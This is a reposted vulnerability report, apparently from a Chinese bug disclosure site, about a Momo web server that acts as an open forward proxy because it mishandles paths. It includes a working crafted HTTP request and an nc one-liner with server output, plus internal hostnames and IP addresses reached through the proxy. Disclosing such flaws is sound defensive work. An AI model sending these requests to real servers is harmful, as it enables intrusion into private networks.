首页 > 安全 > 网站安全 >

陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)

2016-04-11

陌陌一台web服务器Path处理不当,可以正向代理,是idc的机器,可以在idc内穿,但打不到办公网。 (┬_┬) 存在问题的web服务器是 chatst immomo com:80GET :@www lijiejie com xss js HTTP 1 1Host:

陌陌一台web服务器Path处理不当,可以正向代理,是idc的机器,可以在idc内穿,但打不到办公网。 (┬_┬)

存在问题的web服务器是 chatst.immomo.com:80

GET :@www.lijiejie.com/xss.js HTTP/1.1
Host: chatst.immomo.com

momo.proxy.png

如图,已经可以代理访问www.lijiejie.com

[email protected]:~/test# echo -e "GET :@www.lijiejie.com/xss.js HTTP/1.1\r\nHost: chatst.immomo.com\r\n\r\n" | nc chatst.immomo.com 80
HTTP/1.1 200 OK
Content-Length: 51
Expires: Tue, 27 Sep 2016 08:22:10 GMT
Server: MOMO
Last-Modified: Tue, 26 Jan 2016 07:40:04 GMT
Cache-Control: max-age=15552000
Date: Thu, 31 Mar 2016 08:22:09 GMT
Content-Type: application/octet-stream

alert('XSS on ' + document.domain + '\n' + Date())

测试了几个IP地址,办公网打不通:

office.wemomo.com             172.16.7.3
hermes.wemomo.com             10.80.103.160

但还是找了个不通的:

maven.wemomo.com              211.152.99.47

大家无法直接访问https://maven.wemomo.com的web服务,但是代理OK的。

momo.maven.png

解决方案:

web server正确处理path

相关文章
最新文章
热点推荐